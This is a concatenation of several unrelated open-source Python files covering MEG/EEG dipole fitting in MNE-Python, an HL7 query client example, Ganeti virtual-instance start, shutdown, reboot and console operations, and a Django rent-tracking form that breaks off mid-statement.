# are what is needed:
evoked = evoked.copy()
# Determine if a list of projectors has an average EEG ref
if _needs_eeg_average_ref_proj(evoked.info):
raise ValueError('EEG average reference is mandatory for dipole '
'fitting.')
if min_dist < 0:
raise ValueError('min_dist should be positive. Got %s' % min_dist)
if ori is not None and pos is None:
raise ValueError('pos must be provided if ori is not None')
data = evoked.data
if not np.isfinite(data).all():
raise ValueError('Evoked data must be finite')
info = evoked.info
times = evoked.times.copy()
comment = evoked.comment
# Convert the min_dist to meters
min_dist_to_inner_skull = min_dist / 1000.
del min_dist
# Figure out our inputs
neeg = len(pick_types(info, meg=False, eeg=True, ref_meg=False,
exclude=[]))
if isinstance(bem, str):
bem_extra = bem
else:
bem_extra = repr(bem)
logger.info('BEM : %s' % bem_extra)
mri_head_t, trans = _get_trans(trans)
logger.info('MRI transform : %s' % trans)
bem = _setup_bem(bem, bem_extra, neeg, mri_head_t, verbose=False)
if not bem['is_sphere']:
# Find the best-fitting sphere
inner_skull = _bem_find_surface(bem, 'inner_skull')
inner_skull = inner_skull.copy()
R, r0 = _fit_sphere(inner_skull['rr'], disp=False)
# r0 back to head frame for logging
r0 = apply_trans(mri_head_t['trans'], r0[np.newaxis, :])[0]
inner_skull['r0'] = r0
logger.info('Head origin : '
'%6.1f %6.1f %6.1f mm rad = %6.1f mm.'
% (1000 * r0[0], 1000 * r0[1], 1000 * r0[2], 1000 * R))
del R, r0
else:
r0 = bem['r0']
if len(bem.get('layers', [])) > 0:
R = bem['layers'][0]['rad']
kind = 'rad'
else: # MEG-only
# Use the minimum distance to the MEG sensors as the radius then
R = np.dot(np.linalg.inv(info['dev_head_t']['trans']),
np.hstack([r0, [1.]]))[:3] # r0 -> device
R = R - [info['chs'][pick]['loc'][:3]
for pick in pick_types(info, meg=True, exclude=[])]
if len(R) == 0:
raise RuntimeError('No MEG channels found, but MEG-only '
'sphere model used')
R = np.min(np.sqrt(np.sum(R * R, axis=1))) # use dist to sensors
kind = 'max_rad'
logger.info('Sphere model : origin at (% 7.2f % 7.2f % 7.2f) mm, '
'%s = %6.1f mm'
% (1000 * r0[0], 1000 * r0[1], 1000 * r0[2], kind, R))
inner_skull = dict(R=R, r0=r0) # NB sphere model defined in head frame
del R, r0
accurate = False # can be an option later (shouldn't make big diff)
# Deal with DipoleFixed cases here
if pos is not None:
fixed_position = True
pos = np.array(pos, float)
if pos.shape != (3,):
raise ValueError('pos must be None or a 3-element array-like,'
' got %s' % (pos,))
logger.info('Fixed position : %6.1f %6.1f %6.1f mm'
% tuple(1000 * pos))
if ori is not None:
ori = np.array(ori, float)
if ori.shape != (3,):
                raise ValueError('ori must be None or a 3-element array-like,'
                                 ' got %s' % (ori,))
norm = np.sqrt(np.sum(ori * ori))
if not np.isclose(norm, 1):
raise ValueError('ori must be a unit vector, got length %s'
% (norm,))
            logger.info('Fixed orientation  : %6.4f %6.4f %6.4f'
% tuple(ori))
else:
logger.info('Free orientation : <time-varying>')
fit_n_jobs = 1 # only use 1 job to do the guess fitting
else:
fixed_position = False
# Eventually these could be parameters, but they are just used for
# the initial grid anyway
guess_grid = 0.02 # MNE-C uses 0.01, but this is faster w/similar perf
guess_mindist = max(0.005, min_dist_to_inner_skull)
guess_exclude = 0.02
logger.info('Guess grid : %6.1f mm' % (1000 * guess_grid,))
if guess_mindist > 0.0:
logger.info('Guess mindist : %6.1f mm'
% (1000 * guess_mindist,))
if guess_exclude > 0:
logger.info('Guess exclude : %6.1f mm'
% (1000 * guess_exclude,))
logger.info('Using %s MEG coil definitions.'
% ("accurate" if accurate else "standard"))
fit_n_jobs = n_jobs
if isinstance(cov, str):
logger.info('Noise covariance : %s' % (cov,))
cov = read_cov(cov, verbose=False)
logger.info('')
_print_coord_trans(mri_head_t)
_print_coord_trans(info['dev_head_t'])
logger.info('%d bad channels total' % len(info['bads']))
# Forward model setup (setup_forward_model from setup.c)
ch_types = evoked.get_channel_types()
megcoils, compcoils, megnames, meg_info = [], [], [], None
eegels, eegnames = [], []
if 'grad' in ch_types or 'mag' in ch_types:
megcoils, compcoils, megnames, meg_info = \
_prep_meg_channels(info, exclude='bads',
accurate=accurate, verbose=verbose)
if 'eeg' in ch_types:
eegels, eegnames = _prep_eeg_channels(info, exclude='bads',
verbose=verbose)
# Ensure that MEG and/or EEG channels are present
if len(megcoils + eegels) == 0:
raise RuntimeError('No MEG or EEG channels found.')
# Whitener for the data
logger.info('Decomposing the sensor noise covariance matrix...')
picks = pick_types(info, meg=True, eeg=True, ref_meg=False)
# In case we want to more closely match MNE-C for debugging:
# from .io.pick import pick_info
# from .cov import prepare_noise_cov
# info_nb = pick_info(info, picks)
# cov = prepare_noise_cov(cov, info_nb, info_nb['ch_names'], verbose=False)
# nzero = (cov['eig'] > 0)
# n_chan = len(info_nb['ch_names'])
# whitener = np.zeros((n_chan, n_chan), dtype=np.float64)
# whitener[nzero, nzero] = 1.0 / np.sqrt(cov['eig'][nzero])
# whitener = np.dot(whitener, cov['eigvec'])
whitener, _, rank = compute_whitener(cov, info, picks=picks,
rank=rank, return_rank=True)
# Proceed to computing the fits (make_guess_data)
if fixed_position:
guess_src = dict(nuse=1, rr=pos[np.newaxis], inuse=np.array([True]))
logger.info('Compute forward for dipole location...')
else:
logger.info('\n---- Computing the forward solution for the guesses...')
guess_src = _make_guesses(inner_skull, guess_grid, guess_exclude,
guess_mindist, n_jobs=n_jobs)[0]
# grid coordinates go from mri to head frame
transform_surface_to(guess_src, 'head', mri_head_t)
logger.info('Go through all guess source locations...')
# inner_skull goes from mri to head frame
if 'rr' in inner_skull:
transform_surface_to(inner_skull, 'head', mri_head_t)
if fixed_position:
if 'rr' in inner_skull:
check = _surface_constraint(pos, inner_skull,
min_dist_to_inner_skull)
else:
check = _sphere_constraint(
pos, inner_skull['r0'],
R_adj=inner_skull['R'] - min_dist_to_inner_skull)
if check <= 0:
raise ValueError('fixed position is %0.1fmm outside the inner '
'skull boundary' % (-1000 * check,))
# C code computes guesses w/sphere model for speed, don't bother here
fwd_data = dict(coils_list=[megcoils, eegels], infos=[meg_info, None],
ccoils_list=[compcoils, None], coil_types=['meg', 'eeg'],
inner_skull=inner_skull)
# fwd_data['inner_skull'] in head frame, bem in mri, confusing...
_prep_field_computation(guess_src['rr'], bem, fwd_data, n_jobs,
verbose=False)
guess_fwd, guess_fwd_orig, guess_fwd_scales = _dipole_forwards(
fwd_data, whitener, guess_src['rr'], n_jobs=fit_n_jobs)
# decompose ahead of time
guess_fwd_svd = [linalg.svd(fwd, full_matrices=False)
for fwd in np.array_split(guess_fwd,
len(guess_src['rr']))]
guess_data = dict(fwd=guess_fwd, fwd_svd=guess_fwd_svd,
fwd_orig=guess_fwd_orig, scales=guess_fwd_scales)
del guess_fwd, guess_fwd_svd, guess_fwd_orig, guess_fwd_scales # destroyed
logger.info('[done %d source%s]' % (guess_src['nuse'],
_pl(guess_src['nuse'])))
# Do actual fits
data = data[picks]
ch_names = [info['ch_names'][p] for p in picks]
proj_op = make_projector(info['projs'], ch_names, info['bads'])[0]
fun = _fit_dipole_fixed if fixed_position else _fit_dipole
out = _fit_dipoles(
fun, min_dist_to_inner_skull, data, times, guess_src['rr'],
guess_data, fwd_data, whitener, ori, n_jobs, rank)
assert len(out) == 8
if fixed_position and ori is not None:
# DipoleFixed
data = np.array([out[1], out[3]])
out_info = deepcopy(info)
loc = np.concatenate([pos, ori, np.zeros(6)])
out_info['chs'] = [
dict(ch_name='dip 01', loc=loc, kind=FIFF.FIFFV_DIPOLE_WAVE,
coord_frame=FIFF.FIFFV_COORD_UNKNOWN, unit=FIFF.FIFF_UNIT_AM,
coil_type=FIFF.FIFFV_COIL_DIPOLE,
unit_mul=0, range=1, cal=1., scanno=1, logno=1),
dict(ch_name='goodness', loc=np.full(12, np.nan),
kind=FIFF.FIFFV_GOODNESS_FIT, unit=FIFF.FIFF_UNIT_AM,
coord_frame=FIFF.FIFFV_COORD_UNKNOWN,
coil_type=FIFF.FIFFV_COIL_NONE,
unit_mul=0, range=1., cal=1., scanno=2, logno=100)]
for key in ['hpi_meas', 'hpi_results', 'projs']:
out_info[key] = list()
for key in ['acq_pars', 'acq_stim', 'description', 'dig',
'experimenter', 'hpi_subsystem', 'proj_id', 'proj_name',
'subject_info']:
out_info[key] = None
out_info['bads'] = []
out_info._update_redundant()
out_info._check_consistency()
dipoles = DipoleFixed(out_info, data, times, evoked.nave,
evoked._aspect_kind, comment=comment)
else:
dipoles = Dipole(times, out[0], out[1], out[2], out[3], comment,
out[4], out[5], out[6])
residual = evoked.copy().apply_proj() # set the projs active
residual.data[picks] = np.dot(proj_op, out[-1])
logger.info('%d time points fitted' % len(dipoles.times))
return dipoles, residual
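# A minimal usage sketch for fit_dipole (hedged; the file names below are
# placeholders, not part of this module):
#
#     evoked = mne.read_evokeds('sample-ave.fif', condition=0)
#     evoked.crop(0.08, 0.09)  # restrict to the time window of interest
#     cov = mne.read_cov('sample-cov.fif')
#     dip, residual = mne.fit_dipole(evoked, cov, 'sample-bem-sol.fif',
#                                    trans='sample-trans.fif', min_dist=5.)
#     print(dip.pos, dip.gof)
#
# If both ``pos`` and ``ori`` are given, a DipoleFixed (amplitude and
# goodness-of-fit traces at the fixed location/orientation) is returned
# instead of a Dipole.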
def get_phantom_dipoles(kind='vectorview'):
"""Get standard phantom dipole locations and orientations.
Parameters
----------
kind : str
Get the information for the given system:
``vectorview`` (default)
The Neuromag VectorView phantom.
``otaniemi``
The older Neuromag phantom used at Otaniemi.
Returns
-------
pos : ndarray, shape (n_dipoles, 3)
The dipole positions.
ori : ndarray, shape (n_dipoles, 3)
The dipole orientations.
Notes
-----
The Elekta phantoms have a radius of 79.5mm, and HPI coil locations
in the XY-plane at the axis extrema (e.g., (79.5, 0), (0, -79.5), ...).
"""
_check_option('kind', kind, ['vectorview', 'otaniemi'])
if kind == 'vectorview':
# these values were pulled from a scanned image provided by
# Elekta folks
a = np.array([59.7, 48.6, 35.8, 24.8, 37.2, 27.5, 15.8, 7.9])
b = np.array([46.1, 41.9, 38.3, 31.5, 13.9, 16.2, 20.0, 19.3])
x = np.concatenate((a, [0] * 8, -b, [0] * 8))
y = np.concatenate(([0] * 8, -a, [0] * 8, b))
c = [22.9, 23.5, 25.5, 23.1, 52.0, 46.4, 41.0, 33.0]
d = [44.4, 34.0, 21.6, 12.7, 62.4, 51.5, 39.1, 27.9]
z = np.concatenate((c, c, d, d))
signs = ([1, -1] * 4 + [-1, 1] * 4) * 2
elif kind == 'otaniemi':
        # these values were pulled from a Neuromag manual
# (NM20456A, 13.7.1999, p.65)
a = np.array([56.3, 47.6, 39.0, 30.3])
b = np.array([32.5, 27.5, 22.5, 17.5])
c = np.zeros(4)
x = np.concatenate((a, b, c, c, -a, -b, c, c))
y = np.concatenate((c, c, -a, -b, c, c, b, a))
z = np.concatenate((b, a, b, a, b, a, a, b))
signs = [-1] * 8 + [1] * 16 + [-1] * 8
pos = np.vstack((x, y, z)).T / 1000.
# Locs are always in XZ or YZ, and so are the oris. The oris are
# also in the same plane and tangential, so it's easy to determine
# the orientation.
ori = list()
for pi, this_pos in enumerate(pos):
this_ori = np.zeros(3)
idx = np.where(this_pos == 0)[0]
# assert len(idx) == 1
idx = np.setdiff1d(np.arange(3), idx[0])
this_ori[idx] = (this_pos[idx][::-1] /
np.linalg.norm(this_pos[idx])) * [1, -1]
this_ori *= signs[pi]
        # Now we have this property, which we could uncomment to
# double-check:
# np.testing.assert_allclose(np.dot(this_ori, this_pos) /
# np.linalg.norm(this_pos), 0,
# atol=1e-15)
ori.append(this_ori)
ori = np.array(ori)
return pos, ori
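# Quick sketch of the helper above (hedged): for the VectorView phantom this
# yields 32 dipole positions (in meters) with matching unit orientations:
#
#     pos, ori = get_phantom_dipoles('vectorview')
#     assert pos.shape == ori.shape == (32, 3)
#     assert np.allclose(np.linalg.norm(ori, axis=1), 1.)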
def _concatenate_dipoles(dipoles):
"""Concatenate a list of dipoles."""
times, pos, amplitude, ori, gof = [], [], [], [], []
for dipole in dipoles:
times.append(dipole.times)
pos.append(dipole.pos)
amplitude.append(dipole.amplitude)
ori.append(dipole.ori)
gof.append(dipole.gof)
return Dipole(np.concatenate(times), np.concatenate(pos),
np.concatenate(amplitude), np.concatenate(ori),
np.concatenate(gof), name=None)
|
kambysese/mne-python
|
mne/dipole.py
|
Python
|
bsd-3-clause
| 57,802
| 0.000017
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2018, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
from hl7apy.parser import parse_message
def query(host, port):
msg = \
'MSH|^~\&|REC APP|REC FAC|SEND APP|SEND FAC|20110708163513||QBP^Q22^QBP_Q21|111069|D|2.5|||||ITA||EN\r' \
'QPD|IHE PDQ Query|111069|@PID.5.2^SMITH||||\r' \
'RCP|I|'
# establish the connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
# send the message
sock.sendall(parse_message(msg).to_mllp().encode('UTF-8'))
# receive the answer
received = sock.recv(1024*1024)
return received
finally:
sock.close()
if __name__ == '__main__':
res = query('localhost', 6789)
print("Received response: ")
print(repr(res))
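# A hedged follow-up sketch (not part of the original example): assuming the
# server wraps its answer in standard MLLP framing bytes (0x0b ... 0x1c 0x0d),
# the raw response can be unwrapped and parsed back into an hl7apy message:
#
#     raw = res.decode('UTF-8').lstrip('\x0b').rstrip('\x1c\r')
#     ack = parse_message(raw)
#     print(ack.to_er7())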
|
crs4/hl7apy
|
examples/iti_21/client.py
|
Python
|
mit
| 1,870
| 0.004813
|
#
#
# Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Logical units dealing with instance operations (start/stop/...).
Those operations have in common that they affect the operating system in a
running instance directly.
"""
import logging
from ganeti import constants
from ganeti import errors
from ganeti import hypervisor
from ganeti import locking
from ganeti import objects
from ganeti import utils
from ganeti.cmdlib.base import LogicalUnit, NoHooksLU
from ganeti.cmdlib.common import INSTANCE_ONLINE, INSTANCE_DOWN, \
CheckHVParams, CheckInstanceState, CheckNodeOnline, GetUpdatedParams, \
CheckOSParams, ShareAll
from ganeti.cmdlib.instance_storage import StartInstanceDisks, \
ShutdownInstanceDisks
from ganeti.cmdlib.instance_utils import BuildInstanceHookEnvByObject, \
CheckInstanceBridgesExist, CheckNodeFreeMemory, CheckNodeHasOS
from ganeti.hypervisor import hv_base
class LUInstanceStartup(LogicalUnit):
"""Starts an instance.
"""
HPATH = "instance-start"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def CheckArguments(self):
# extra beparams
if self.op.beparams:
# fill the beparams dict
objects.UpgradeBeParams(self.op.beparams)
utils.ForceDictType(self.op.beparams, constants.BES_PARAMETER_TYPES)
def ExpandNames(self):
self._ExpandAndLockInstance()
self.recalculate_locks[locking.LEVEL_NODE_RES] = constants.LOCKS_REPLACE
def DeclareLocks(self, level):
if level == locking.LEVEL_NODE_RES:
self._LockInstancesNodes(primary_only=True, level=locking.LEVEL_NODE_RES)
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = {
"FORCE": self.op.force,
}
env.update(BuildInstanceHookEnvByObject(self, self.instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
cluster = self.cfg.GetClusterInfo()
# extra hvparams
if self.op.hvparams:
# check hypervisor parameter syntax (locally)
utils.ForceDictType(self.op.hvparams, constants.HVS_PARAMETER_TYPES)
filled_hvp = cluster.FillHV(self.instance)
filled_hvp.update(self.op.hvparams)
hv_type = hypervisor.GetHypervisorClass(self.instance.hypervisor)
hv_type.CheckParameterSyntax(filled_hvp)
CheckHVParams(self, self.instance.all_nodes, self.instance.hypervisor,
filled_hvp)
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
self.primary_offline = \
self.cfg.GetNodeInfo(self.instance.primary_node).offline
if self.primary_offline and self.op.ignore_offline_nodes:
self.LogWarning("Ignoring offline primary node")
if self.op.hvparams or self.op.beparams:
self.LogWarning("Overridden parameters are ignored")
else:
CheckNodeOnline(self, self.instance.primary_node)
bep = self.cfg.GetClusterInfo().FillBE(self.instance)
bep.update(self.op.beparams)
# check bridges existence
CheckInstanceBridgesExist(self, self.instance)
remote_info = self.rpc.call_instance_info(
self.instance.primary_node, self.instance.name,
self.instance.hypervisor, cluster.hvparams[self.instance.hypervisor])
remote_info.Raise("Error checking node %s" %
self.cfg.GetNodeName(self.instance.primary_node),
prereq=True, ecode=errors.ECODE_ENVIRON)
if remote_info.payload:
if hv_base.HvInstanceState.IsShutdown(remote_info.payload["state"]):
raise errors.OpPrereqError("Instance '%s' was shutdown by the user,"
" please shutdown the instance before"
" starting it again" % self.instance.name,
errors.ECODE_INVAL)
else: # not running already
CheckNodeFreeMemory(
self, self.instance.primary_node,
"starting instance %s" % self.instance.name,
bep[constants.BE_MINMEM], self.instance.hypervisor,
self.cfg.GetClusterInfo().hvparams[self.instance.hypervisor])
def Exec(self, feedback_fn):
"""Start the instance.
"""
if not self.op.no_remember:
self.cfg.MarkInstanceUp(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as started")
else:
StartInstanceDisks(self, self.instance, self.op.force)
result = \
self.rpc.call_instance_start(self.instance.primary_node,
(self.instance, self.op.hvparams,
self.op.beparams),
self.op.startup_paused, self.op.reason)
msg = result.fail_msg
if msg:
ShutdownInstanceDisks(self, self.instance)
raise errors.OpExecError("Could not start instance: %s" % msg)
class LUInstanceShutdown(LogicalUnit):
"""Shutdown an instance.
"""
HPATH = "instance-stop"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = BuildInstanceHookEnvByObject(self, self.instance)
env["TIMEOUT"] = self.op.timeout
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
if not self.op.force:
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
else:
self.LogWarning("Ignoring offline instance check")
self.primary_offline = \
self.cfg.GetNodeInfo(self.instance.primary_node).offline
if self.primary_offline and self.op.ignore_offline_nodes:
self.LogWarning("Ignoring offline primary node")
else:
CheckNodeOnline(self, self.instance.primary_node)
def Exec(self, feedback_fn):
"""Shutdown the instance.
"""
# If the instance is offline we shouldn't mark it as down, as that
# resets the offline flag.
if not self.op.no_remember and self.instance.admin_state in INSTANCE_ONLINE:
self.cfg.MarkInstanceDown(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as stopped")
else:
result = self.rpc.call_instance_shutdown(
self.instance.primary_node,
self.instance,
self.op.timeout, self.op.reason)
msg = result.fail_msg
if msg:
self.LogWarning("Could not shutdown instance: %s", msg)
ShutdownInstanceDisks(self, self.instance)
class LUInstanceReinstall(LogicalUnit):
"""Reinstall an instance.
"""
HPATH = "instance-reinstall"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
return BuildInstanceHookEnvByObject(self, self.instance)
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster and is not running.
"""
instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckNodeOnline(self, instance.primary_node, "Instance primary node"
" offline, cannot reinstall")
if instance.disk_template == constants.DT_DISKLESS:
raise errors.OpPrereqError("Instance '%s' has no disks" %
self.op.instance_name,
errors.ECODE_INVAL)
CheckInstanceState(self, instance, INSTANCE_DOWN, msg="cannot reinstall")
if self.op.os_type is not None:
# OS verification
CheckNodeHasOS(self, instance.primary_node, self.op.os_type,
self.op.force_variant)
instance_os = self.op.os_type
else:
instance_os = instance.os
node_uuids = list(instance.all_nodes)
if self.op.osparams:
i_osdict = GetUpdatedParams(instance.osparams, self.op.osparams)
CheckOSParams(self, True, node_uuids, instance_os, i_osdict)
self.os_inst = i_osdict # the new dict (without defaults)
else:
self.os_inst = None
self.instance = instance
def Exec(self, feedback_fn):
"""Reinstall the instance.
"""
if self.op.os_type is not None:
feedback_fn("Changing OS to '%s'..." % self.op.os_type)
self.instance.os = self.op.os_type
# Write to configuration
self.cfg.Update(self.instance, feedback_fn)
StartInstanceDisks(self, self.instance, None)
try:
feedback_fn("Running the instance OS create scripts...")
# FIXME: pass debug option from opcode to backend
result = self.rpc.call_instance_os_add(self.instance.primary_node,
(self.instance, self.os_inst),
True, self.op.debug_level)
result.Raise("Could not install OS for instance %s on node %s" %
(self.instance.name,
self.cfg.GetNodeName(self.instance.primary_node)))
finally:
ShutdownInstanceDisks(self, self.instance)
class LUInstanceReboot(LogicalUnit):
"""Reboot an instance.
"""
HPATH = "instance-reboot"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = {
"IGNORE_SECONDARIES": self.op.ignore_secondaries,
"REBOOT_TYPE": self.op.reboot_type,
"SHUTDOWN_TIMEOUT": self.op.shutdown_timeout,
}
env.update(BuildInstanceHookEnvByObject(self, self.instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
CheckNodeOnline(self, self.instance.primary_node)
# check bridges existence
CheckInstanceBridgesExist(self, self.instance)
def Exec(self, feedback_fn):
"""Reboot the instance.
"""
cluster = self.cfg.GetClusterInfo()
remote_info = self.rpc.call_instance_info(
self.instance.primary_node, self.instance.name,
self.instance.hypervisor, cluster.hvparams[self.instance.hypervisor])
remote_info.Raise("Error checking node %s" %
self.cfg.GetNodeName(self.instance.primary_node))
instance_running = bool(remote_info.payload)
current_node_uuid = self.instance.primary_node
if instance_running and \
self.op.reboot_type in [constants.INSTANCE_REBOOT_SOFT,
constants.INSTANCE_REBOOT_HARD]:
result = self.rpc.call_instance_reboot(current_node_uuid, self.instance,
self.op.reboot_type,
self.op.shutdown_timeout,
self.op.reason)
result.Raise("Could not reboot instance")
else:
if instance_running:
result = self.rpc.call_instance_shutdown(current_node_uuid,
self.instance,
self.op.shutdown_timeout,
self.op.reason)
result.Raise("Could not shutdown instance for full reboot")
ShutdownInstanceDisks(self, self.instance)
else:
self.LogInfo("Instance %s was already stopped, starting now",
self.instance.name)
StartInstanceDisks(self, self.instance, self.op.ignore_secondaries)
result = self.rpc.call_instance_start(current_node_uuid,
(self.instance, None, None), False,
self.op.reason)
msg = result.fail_msg
if msg:
ShutdownInstanceDisks(self, self.instance)
raise errors.OpExecError("Could not start instance for"
" full reboot: %s" % msg)
self.cfg.MarkInstanceUp(self.instance.uuid)
def GetInstanceConsole(cluster, instance, primary_node, node_group):
"""Returns console information for an instance.
@type cluster: L{objects.Cluster}
@type instance: L{objects.Instance}
@type primary_node: L{objects.Node}
@type node_group: L{objects.NodeGroup}
@rtype: dict
"""
hyper = hypervisor.GetHypervisorClass(instance.hypervisor)
# beparams and hvparams are passed separately, to avoid editing the
# instance and then saving the defaults in the instance itself.
hvparams = cluster.FillHV(instance)
beparams = cluster.FillBE(instance)
console = hyper.GetInstanceConsole(instance, primary_node, node_group,
hvparams, beparams)
assert console.instance == instance.name
assert console.Validate()
return console.ToDict()
class LUInstanceConsole(NoHooksLU):
"""Connect to an instance's console.
This is somewhat special in that it returns the command line that
you need to run on the master node in order to connect to the
console.
"""
REQ_BGL = False
def ExpandNames(self):
self.share_locks = ShareAll()
self._ExpandAndLockInstance()
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
CheckNodeOnline(self, self.instance.primary_node)
def Exec(self, feedback_fn):
"""Connect to the console of an instance
"""
node_uuid = self.instance.primary_node
cluster_hvparams = self.cfg.GetClusterInfo().hvparams
node_insts = self.rpc.call_instance_list(
[node_uuid], [self.instance.hypervisor],
cluster_hvparams)[node_uuid]
node_insts.Raise("Can't get node information from %s" %
self.cfg.GetNodeName(node_uuid))
if self.instance.name not in node_insts.payload:
if self.instance.admin_state == constants.ADMINST_UP:
state = constants.INSTST_ERRORDOWN
elif self.instance.admin_state == constants.ADMINST_DOWN:
state = constants.INSTST_ADMINDOWN
else:
state = constants.INSTST_ADMINOFFLINE
raise errors.OpExecError("Instance %s is not running (state %s)" %
(self.instance.name, state))
logging.debug("Connecting to console of %s on %s", self.instance.name,
self.cfg.GetNodeName(node_uuid))
node = self.cfg.GetNodeInfo(self.instance.primary_node)
group = self.cfg.GetNodeGroup(node.group)
return GetInstanceConsole(self.cfg.GetClusterInfo(),
self.instance, node, group)
|
badp/ganeti
|
lib/cmdlib/instance_operation.py
|
Python
|
gpl-2.0
| 17,072
| 0.007908
|
__all__ = ['ttypes', 'constants', 'PlayerStrategy']
|
pezia/poker-croupier
|
player/py/lib/api/player_strategy/__init__.py
|
Python
|
gpl-2.0
| 52
| 0
|
##############################################################################
#
# Immobilier is an application
# designed to manage the core business of property management: buildings,
# rental agreements and so on.
#
# Copyright (C) 2016-2018 Verpoorten Leïla
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django import forms
from main import models as mdl
from main.forms.utils.datefield import DatePickerInput, DATE_FORMAT
from main.models.enums import etat_suivi as etat_suivi_enum
READONLY_ATTR = "disabled"
class SuiviForm(forms.ModelForm):
# date_paiement = forms.HiddenInput()
# financement_location = forms.HiddenInput()
date_paiement_reel = forms.DateField(widget=DatePickerInput(format=DATE_FORMAT),
input_formats=[DATE_FORMAT, ],
required=False)
class Meta:
model = mdl.suivi_loyer.SuiviLoyer
fields = ['date_paiement', 'financement_location', 'etat_suivi', 'remarque', 'loyer_percu', 'charges_percu',
'date_paiement_reel']
def __init__(self, *args, **kwargs):
super(SuiviForm, self).__init__(*args, **kwargs)
self.fields['date_paiement'].widget = forms.HiddenInput()
self.fields['financement_location'].widget = forms.HiddenInput()
self.fields['date_paiement_reel'].help_text = '(Double clic = date du jour)'
if self.instance:
self.fields['loyer_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.loyer)
self.fields['charges_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.charges)
def clean(self):
self.validate_dates()
self.validate_status()
def validate_status(self):
if self.cleaned_data.get("etat_suivi") == etat_suivi_enum.PAYE and \
(self.cleaned_data.get("loyer_percu") is None or self.cleaned_data.get("loyer_percu") == 0) and \
